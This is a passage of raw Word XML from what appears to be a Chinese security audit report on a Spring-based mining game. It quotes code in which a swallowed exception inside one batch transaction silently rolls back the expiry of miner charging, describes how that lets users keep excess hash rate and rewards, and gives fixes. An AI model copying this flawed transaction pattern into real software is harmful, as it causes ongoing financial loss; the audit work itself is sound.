          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PROPAGATION_REQUIRED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）——这意味着它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>而非新起事务 T1。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>循环体内的异常处理为：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catch (Exception ignored) {}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或其内部调用链（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>levelRewardService.claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userSeasonService.updateSeasonData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等）抛出任意 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时，Spring 事务拦截器在代理层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>先将 T1 标记为 `rollbackOnly=true`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，再将异常重新抛出。外层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>catch (Exception ignored)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 Java 层面吞掉了异常，循环继续执行后续用户。</w:t>
      </w:r>
    </w:p>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resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 正常 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 后，Spring 代理尝试提交 T1，发现 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rollbackOnly=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，抛出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UnexpectedRollbackException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>整批次所有 `userMinerRepository.save(m)` 操作（isCharged→0、chargedExpireTime→null）全部回滚</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下一次调度（60 秒后）再次查询 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findExpiredCharging(now)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，这批矿机依然满足条件，若同一异常持续存在，循环往复，充电状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>永远无法被重置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1275"/>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PowerScheduler.resetExpiredCharging()          @Transactional → 开启事务 T1</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ├─ userMinerRepository.save(m) × N            已将多台矿机 isCharged 置 0（未提交）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    └─ minerService.recalcUserLevelAndHashRate()  @Transactional(REQUIRED) → 加入 T1</w:t>
              <w:br/>
              <w:t xml:space="preserve">          ├─ computeBaseTotalHashRate()</w:t>
              <w:br/>
              <w:t xml:space="preserve">          └─ userRepository.findByIdForUpdate()</w:t>
              <w:br/>
              <w:t xml:space="preserve">               └─ grantUsdtOnLevelUp() / claimLevelReward()</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    └─ ★ 若此处抛出 RuntimeException</w:t>
              <w:br/>
              <w:t xml:space="preserve">                          Spring proxy: T1.setRollbackOnly(true) + rethrow</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ← catch (Exception ignored) 吞掉异常，循环继续</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ← resetExpiredCharging 正常返回</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ← Spring proxy commit T1 → 发现 rollbackOnly → UnexpectedRollbackException</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  ← 所有 save(m) 回滚，矿机仍为 isCharged=1 + 已过期时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1276"/>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p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>矿机充电加成（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getChargeAccelerationRatio()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）持续生效，用户实际获得超出权利的算力倍增</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1278"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>更高算力持续累积游戏挖矿收益（金币、电力、矿机等实物资源）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">若充电过期期间恰好触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 逻辑（如其他并发操作提升了矿机等级），USDT 奖励的发放也将处于不可预期的事务状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">当异常原因为持久性故障（如某用户数据异常导致 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>claimLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 始终报错），则整个矿机过期系统对受影响批次彻底失效，损失持续累积</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定时任务入口：PowerScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 60_000)</w:t>
              <w:br/>
              <w:t>@Transactional                                                    // ← 开启外层事务 T1</w:t>
              <w:br/>
              <w:t>public void resetExpiredCharging() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    LocalDateTime now = LocalDateTime.now();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; expired = userMinerRepository.findExpiredCharging(now);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (expired.isEmpty()) return;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    Set&lt;Long&gt; affectedUserIds = expired.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(UserMiner::getUserId).filter(id -&gt; id != null)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .collect(Collectors.toSet());</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    for (UserMiner m : expired) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setIsCharged(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        m.setChargedExpireTime(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userMinerRepository.save(m);                              // ← 写入 T1（未提交）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long userId : affectedUserIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            minerService.recalcUserLevelAndHashRate(userId);      // ← PROPAGATION_REQUIRED：加入 T1</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) {}                            // ← ★ 漏洞点：Java 层吞异常</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                                  //   但 Spring 已将 T1 标记 rollbackOnly</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // resetExpiredCharging 正常返回 → Spring proxy 尝试提交 T1</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // → 发现 rollbackOnly=true → 抛 UnexpectedRollbackException</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // → 所有 save(m) 全部回滚，矿机充电状态永不过期</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 被调用方：MinerService.java</w:t>
              <w:br/>
              <w:t>@Transactional                                                    // ← PROPAGATION_REQUIRED，加入 T1</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(userId).ifPresent(u -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userNewLevel &gt; oldLevel) {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>grantUsdtOnLevelUp(userId, oldLevel + 1, userNewLevel);      // ← 若此处抛 RuntimeException</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardService.claimLevelReward(userId, userNewLevel);   // ← 或此处抛 RuntimeException</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userSeasonService.updateSeasonData(userId, maxLevel, maxStarLevel, totalHash); // ← 或此处</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 任一 RuntimeException → Spring proxy 标记 T1.rollbackOnly=true 并 rethrow</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漏洞利用场景说明（代码缺陷型，无 HTTP POC）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1281"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>持久性故障触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：系统运行中，若任一用户的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用因数据异常（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>levelRewardService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内某用户奖励配置缺失触发 NPE）持续抛出 RuntimeException</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1282"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每次调度执行（每 60 秒）时，该用户的处理导致整批次事务被标记 rollbackOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">所有到期矿机的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 清零操作全部回滚，矿机保持 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isCharged=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中的充电加速条件持续满足，用户长期享有超额算力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1285"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>超额算力持续产出游戏资源（金币、电力、矿机），在允许变现的业务场景下导致实质性资金损失</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>✅ 修复建议（描述设计方向，非防御性建议）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>根本修复方案应选择其一：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1286"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>方案一（推荐）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>resetExpiredCharging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中移除外层 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，改为每条矿机用独立事务更新；将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的调用改为独立事务（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PROPAGATION_REQUIRES_NEW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）或移出循环批量异步处理，从架构上消除跨用户事务污染</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1287"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>方案二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：在捕获到异常后，通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TransactionAspectSupport.currentTransactionStatus().setRollbackOnly()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 主动感知并分割事务，或直接不在定时批处理上使用跨用户的大事务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1288"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
